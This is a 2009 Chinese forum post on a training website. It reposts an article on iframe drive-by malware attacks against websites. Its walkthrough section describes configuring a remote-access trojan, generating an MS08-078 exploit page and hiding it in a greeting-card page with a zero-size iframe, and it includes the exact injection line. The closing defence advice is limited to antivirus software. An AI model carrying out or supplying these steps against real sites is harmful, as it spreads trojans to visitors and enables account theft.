企业培训
首页 地区推荐 清华EDP 企业内训 公开课 职业培训 HR资讯 培训需求 培训公司 培训顾问 客户服务 在线论坛
当前类别 > 在线论坛
     
巅峰培训论坛 > 先进管理经验[管理培训资源] >
你必须先进行登录 才能发贴,注册新会员请点这里.
今日贴数:7729 |主题总数:77118 | 帖子总数:79972 | 会员总数:2538

最新贴子 |  热门贴子 |  搜索贴子 
  本版搜索:  
清华大学总裁班目录 │││ 北京大学总裁班目录 │││ 中国能源电力企业家班 │││ 国家职业资格考证
人力 营销 财务 生产 职业经理 投融资 收藏品艺术品投资鉴赏 能源班 特色小镇班 PPP实战 经营方略CEO班 私募投资(PE) 清华教授、能源局领导、知名企业家,培养全球化视野及国际竞争力的创新型能源企业领导者 人力资源师国际财务师安全评价师信用管理师对外汉语教师
    您是本贴的第 15408 个阅读者  
  主题:了解IFRAME框架挂马\相应的防范解决方法 2009/7/15 20:18:42  
   zgzx1
   等级:论坛骑士(三级)
   积分:2372分
   注册:2009-5-20
   发表:709(415主题贴)
   登录:1100
1 
了解IFRAME框架挂马\相应的防范解决方法
     了解IFRAME框架挂马\相应的防范解决方法
    
     注:最近自己网站被iframe框架挂马在找解决办法,找的这样一篇文章:
    
     当前网络安全最大的危险是什么?很多人都会说是网页挂马。没错!为了大规模盗号,挂马的网页在去年数以千万计的增长。普通网民知道怎么在电脑中防范网页挂马就可以了,从事和想从事与网络安全相关工作的朋友就要多掌握一些知识,知道网页挂马到底是怎么进行的,有哪几种方式。知己知彼,就会更好地维护网吧、网站等,就会增加自己的安全技能,逐渐成长为一名安全工程师。
       一名优秀的安全工程师,要能独立负责网站安全、局域网安全、服务器安全等,要了解网页挂马有IFRAME框架挂马、JS文件挂马、伪装挂马、CSS挂马、ActiveX组件挂马等方式,这样才可以有针对性地进行防范,避免网站和服务器等安全威胁。下面,我们来迈出成长为安全工程师的第一步,掌握IFRAME框架挂马的底细以及相应的防范方法。
    
       什么是IFRAME框架挂马
    
       网页挂马到如今已经发展出许多方法与应用手段,其中IFRAME网页框架挂马是最典型的挂马方式,也是最基本的挂马方式,可以说没有IFRAME,网页木马中有一多半就无法很好地隐藏,让用户在不察觉中受到攻击。
    
       什么是IFRAME?IFRAME是一个非常普通的HTML语言标记,它主要用来在一个网页界面中,划分出左右或者上下的框架,就如同我们电视机的画中画效果一样。图2中的山寨搜索引擎的界面就是典型的IFRAME的引用。
    
       但是IFRAME功能也被黑客巧妙地利用了,黑客在一些看似正常的网页中,使用长宽为0的隐藏框架,让用户在不知不觉中打开含有漏洞溢出内容的网页木马,这种手法就如同在画中画电视中打开了一个收费频道,但是由于收费频道的画面尺寸被恶意修改成了0,所以看电视的人并不知道自己已经打开了收费频道,虽然他并没有看到,但是事实上收费频道却的确在播放,而且会收取用户的使用费。
    
       IFRAME框架挂马实战
    
       下面我们来做个演示,看看IFRAME框架挂马到底是怎么做的。
    
       第一步:准备一款得心应手的木马,例如PCShare,这款软件在设置上非常简单,易于操作上手。设置好相关服务,最后生成木马所用的服务控制端。
    
       第二步:使用FTP将木马上传到自己的网站空间中,并用记事本记录下木马的网络路径。然后再用《MS08-078网页木马生成器》,生成一个带有MS08-078漏洞的恶意网页。找一个正常的新年贺卡网页,将该网页保存到自己指定的目录中,然后使用Web Designer或Dreamweaver网页编辑软件对保存的网页进行调整修改,然后上传到自己的网站空间中,看图片等内容是否能够正常显示。
    
       第三步:再一次打开修改好的贺卡网页,使用IFRAME标记语句,将生成好的MS08-078网页嵌入到贺卡网页中,嵌入挂马代码如下:
     <iframe src=http://www.hrweek.cn/ms08078.html width=0 height=0></iframe>
    
       将这段代码插入到贺卡网页之中后,就完成了我们的网页挂马操作。浏览贺卡网页的用户,在看到贺卡页面之后,也随之运行了保存在指定位置“http://www.hrweek.cn/ms08078.html”的漏洞溢出页面,但是由于它的长和宽都为“0”,观看贺卡网站的用户不会看到溢出页面。
    
       提示:对于IFRAME标记这种利用正常HTML语言功能实现隐藏的挂马方式,目前并没有好的防范方法,因为它是正常的网页功能。大家只能够寄希望于杀毒软件和防挂马软件阻止利用IFRAME标记内嵌的溢出病毒网页。我们建议在安装杀毒软件之后,能够安装第三方防挂马软件作为补充,例如锐甲、360等。
    
2009/7/15 20:18:42
编辑该贴   回复该贴 | 查看 
1/0 页 每页 10 贴 本主题贴数 0   分页: 转到
管理选项:  删除  | 总置顶  | 置顶  | 精华  | 普通  | 转移该贴到:
 
快速回复(必须登陆成功才能发表)
 用户名:  密码:
 主  题:* 不能超过50个汉字或者100个字符
粗体 斜体 下划线 居中 空格 超级链接 插入图片 插入Flash 飞行的文字 移动的文字
 

 
  
 
清华大学高级研修班   清华总裁班 能源产业500强项目库  能源产业总裁班  中央财经大学私募班  能源500强企业生态   核技术联盟
  有新帖   没新帖   总置顶   置顶   精华贴   热贴   普通贴
本站网络实名:“颠峰培训网”“颠峰人力资源网”
Copyright 2004 All rights reserved     版权所有:巅峰培训
地址:海淀区中关村东路95号中国科学院自动化东楼  电话:(010)8243115O